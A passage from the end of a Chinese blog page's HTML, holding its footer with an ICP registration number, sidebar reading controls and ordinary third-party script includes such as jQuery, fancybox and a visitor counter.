href="">blog</a>!</div><div class="icp"><a><img class="icp-icon" src="/img/icp.png"/><span>皖ICP备18014492号-1</span></a></div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><i class="fa fa-book" id="readmode" title="阅读模式"></i><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="简繁转换" target="_self">繁</a><i class="darkmode fa fa-moon-o" id="darkmode" title="夜间模式"></i></div><div id="rightside-config-show"><div id="rightside_config" title="设置"><i class="fa fa-cog" aria-hidden="true"></i></div><i class="fa fa-list-ul close" id="mobile-toc-button" title="目录" aria-hidden="true"></i><i class="fa fa-arrow-up" id="go-up" title="回到顶部" aria-hidden="true"></i></div></section><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script id="ribbon_piao" mobile="false" src="/js/third-party/piao.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page@latest/instantpage.min.js" type="module"></script></body></html>